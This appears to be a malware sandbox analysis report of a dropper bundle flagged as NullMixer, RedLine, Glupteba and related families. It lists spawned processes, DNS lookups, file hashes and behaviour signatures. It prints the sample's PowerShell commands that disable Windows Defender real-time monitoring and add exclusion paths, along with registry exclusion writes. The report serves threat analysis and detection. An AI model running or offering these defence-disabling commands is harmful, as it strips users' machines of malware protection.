PID 3972 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a0affb29d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed101f2195049.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10b607271059cb7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10fa57e769925f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed103b2f384c2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10d7483856.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1095e8d3cef4ec773.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1001440e7e09.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed109189c07b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10eb606bd1d021d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a80f141fb08.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10799545d143108.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10520e75c2eb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe

Wed10eb606bd1d021d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe

Wed10fa57e769925f6.exe

C:\Users\Admin\AppData\Local\Temp\is-GQIH7.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GQIH7.tmp\Wed10fa57e769925f6.tmp" /SL5="$70268,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe" -u

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-UNCCS.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-UNCCS.tmp\Wed10fa57e769925f6.tmp" /SL5="$B0216,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe" /SILENT

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 tweakballs.com udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 56.jpgamehome.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe

MD5 b6140096778ba8327684188903b829f9
SHA1 a8c542ed9b1c29d07cc5c955ef29f3f92531887c
SHA256 32096a36f4ce1bfed14e19eedfd6b882e997c38241a182142332a2bf4c9dbb64
SHA512 7f8fa614fae4aa6622d28f228f5b39a90ebf66f598acb06bbc2a219aeab6a1409393dcd82a03b60e418671c66f9c3da9510fdea9a3aa19716daf9385925f0c6f

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2020-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2020-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2020-63-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2020-62-0x0000000064941000-0x000000006494F000-memory.dmp

memory/2020-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2020-67-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2020-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2020-60-0x0000000000770000-0x00000000007FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2020-57-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2020-74-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2020-73-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2020-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2020-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2020-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2020-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/1156-75-0x0000000073E6E000-0x0000000073E6F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed1015ba90d2.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10799545d143108.exe

MD5 6bddb7edd2648c177e0ef423cc7df23f
SHA1 d83a67835d694dc9d2726794e9c0a1d10bb1c06a
SHA256 af86823aa88c173cb727965d8a7a7d336c4d47e8d4286e0c22e2f2b7ef314e35
SHA512 761e1bd36d6ad0ff68f53784e34a3a34d936e1ec670a7a3692ad20d3bfde20484a593ababf1559ed85590b2481eaba4849b15022c6c0586dbe30237790f4a20a

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10a80f141fb08.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed109189c07b.exe

MD5 5b3913c5aaf3e1a91ca73679603ec70b
SHA1 1df5b353c591b14989fae254fb47a529aadd3338
SHA256 8e554195273cc328d37d7e255cbaac6589eb44d596e6e2fea6d3766bf2908d7b
SHA512 c90d8d68591478d095ce86ae5c0c4f654023937d31c35390d3c622ecd2e8c4b9a5b3598cfe49419c094afcb699b95f489016b39799db4949d976d814a05efae3

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10520e75c2eb.exe

MD5 18c977c8af2d6a4491109f686b8430ec
SHA1 4265fe935115de077d22f3279b1cf5626a28a623
SHA256 cec7c81038db8fe58fb50abd445d9b48d7b0d575a5c934f7a7d5c53a0be8a0ac
SHA512 4a56c2356b7c41fc9dbd36e02f103f9938d0fe221dd5149705f9ea58e53af6d8da58e1216a77ff792c8ead8aca7a1c052c8d204435e7f4364e3e4cd5b9d54f72

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe

MD5 99471e8043cb5f141962e1cfe12d44f4
SHA1 57c6baf415f892dfa82c206c1380a34130dad19d
SHA256 1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509
SHA512 a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed1001440e7e09.exe

MD5 a66e417ccbb28f68b13711bcfc2c4f9f
SHA1 d0076ec3fd9c50816e3385f1d4ce6231411a2f19
SHA256 91bc4939340bf81d9a1c4e8d5b58717691070e67f2a802fe8b6e5f6f6af39f59
SHA512 215779aa9782dc3568b3463967bab83629c1b84d0fec319f25ec98c8c51e460ad74bcd0261f80690c116139e20b9ff12a8a30777e372fe5eefc770dd35fe0f32

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10d7483856.exe

MD5 6d8ff7889acdcfd9f785e073e6ab4f4d
SHA1 5a878803d1c355fae35d684f59f26c1b4a838e6c
SHA256 8e50b8cdea9a829fe00a3d81bad328f6f76581d20ba9cc8cf6d8642d0aa882c7
SHA512 fcb23c40e31839402927dc1cdecf750d4c32c609f42337741f400069c8763599ad6604ed9d7fd86d7d6ee7d6f7b4eca7d132ceb5796f2dad99223e619897b3ab

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed103b2f384c2a.exe

MD5 5d436a862c018c54ce2427968c556325
SHA1 97d03f2ed1c32b1de5467414a1c2fea6eb86404a
SHA256 060b9cbca548f4fbd738d79b735852476783b7bce3b373ec620b31fb9f8e39dc
SHA512 2c16938ca1a944b36f944d74ffdb5f6ec4c5f8a49688d6746d966cafcd55287b2794b010875bc3868b3a8e7a587b0160ee564244e98b61e8a59b978954b2ba78

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10b607271059cb7.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed101f2195049.exe

MD5 5eec35ae4619a7992130f13f66b03002
SHA1 47141ead2a1166234970c3dba5821cee57ddbb4d
SHA256 947efb32f120d30758ff6801dd1118922cff317411e87906aa9153fe928b1156
SHA512 5f8ae8110b7aa626cf1002f1f214ccc2fd09956cb9d2d82d31115adee356ffd529d1eef4f32a2f193fd862029f930ad01f068b22335d61a00ae5b25106c0590a

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10a0affb29d.exe

MD5 d60755a29f9dc368fe71fbadf96b640c
SHA1 d3ac47604f6d91cbc76d9013ba9b3c779f69ad27
SHA256 1129ef957be36f46c5ba500a3f48a237069006b699d570360f876f6c186a7606
SHA512 7dadfa4c0401e688ef0ab6f2c5b175f4943243bd97c4310f0f0bbb9fd7f096e80993ea4e9d598109ee6d0436ff2331d485966c831054960cf62ce97b58102c8a

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed1095e8d3cef4ec773.exe

MD5 0426dbe3753b2d07d3612fceb824a182
SHA1 4f28da2d30710389cabf10385cb8dc5cbf4be74a
SHA256 6fbe7d2d78413b54c593100e706e727f771714e2fa1b584bdc57836b1bd44d60
SHA512 f6aa58bbfd5f976a76da7b12d60d63326d6d78996cb849e0d4075a7f1ea6ce9eb69d90ec5c68e27de9ab4ec4625090a575f2e3b56ff7e28463fabcaa076c4ddd

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed106168c8ce90b57b8.exe

MD5 c7cd0def6982f7b281c6a61d29eec4be
SHA1 f9f600d70d60cf79563e84cec0b883fa3f541690
SHA256 b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9
SHA512 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

memory/2020-96-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2020-92-0x0000000000400000-0x000000000051C000-memory.dmp

memory/3464-103-0x00000000053B0000-0x00000000059D8000-memory.dmp

memory/3464-110-0x0000000005AC0000-0x0000000005B26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gidrpygs.bqw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3464-117-0x0000000005BB0000-0x0000000005F04000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GQIH7.tmp\Wed10fa57e769925f6.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-8GJ77.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/3464-109-0x0000000005A50000-0x0000000005AB6000-memory.dmp

memory/3464-108-0x0000000005320000-0x0000000005342000-memory.dmp

memory/1600-106-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3464-144-0x00000000061E0000-0x00000000061FE000-memory.dmp

memory/3464-145-0x00000000067C0000-0x000000000680C000-memory.dmp

memory/4828-150-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2240-151-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1600-155-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3464-102-0x0000000073E60000-0x0000000074610000-memory.dmp

memory/2020-101-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2020-99-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2020-98-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2020-100-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3464-91-0x0000000004C60000-0x0000000004C96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PKCJK.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1156-189-0x0000000006F20000-0x0000000006FC3000-memory.dmp

memory/3464-179-0x000000006FA20000-0x000000006FA6C000-memory.dmp

memory/1156-178-0x0000000006CB0000-0x0000000006CCE000-memory.dmp

memory/1156-168-0x000000006FA20000-0x000000006FA6C000-memory.dmp

memory/1156-167-0x0000000006CD0000-0x0000000006D02000-memory.dmp

memory/1156-190-0x00000000076B0000-0x0000000007D2A000-memory.dmp

memory/1156-191-0x0000000007070000-0x000000000708A000-memory.dmp

memory/1156-192-0x00000000070F0000-0x00000000070FA000-memory.dmp

memory/1156-193-0x00000000072E0000-0x0000000007376000-memory.dmp

memory/1156-194-0x0000000007270000-0x0000000007281000-memory.dmp

memory/3464-195-0x0000000007740000-0x000000000774E000-memory.dmp

memory/3464-196-0x0000000007750000-0x0000000007764000-memory.dmp

memory/1156-197-0x00000000073A0000-0x00000000073BA000-memory.dmp

memory/1156-198-0x0000000007390000-0x0000000007398000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c1f16cc60961e70e8caea0cedee41624
SHA1 3a19c37e94897eb0568b392e2e9a7bb993f97651
SHA256 dbcfd8c618014e91c68f04d4496dabe00612001dd5c2501f5d0d6a71824d2436
SHA512 d0ebdea055cc37518a3e13184f0608690642f6825e9a5076582a88614bff08f703741b6ceeaa8649ddf22ccf832fe925df75bf1b10da70bfcc6877db2c710fbf

memory/3464-204-0x0000000073E60000-0x0000000074610000-memory.dmp

memory/2240-205-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4328-206-0x0000000000400000-0x00000000004BD000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 05:21

Reported

2024-11-07 05:23

Platform

win7-20240903-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Glupteba

loader dropper glupteba

Glupteba family

glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Wed1095e8d3cef4ec773.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\HolyMoon = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10799545d143108.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10d7483856.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a80f141fb08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
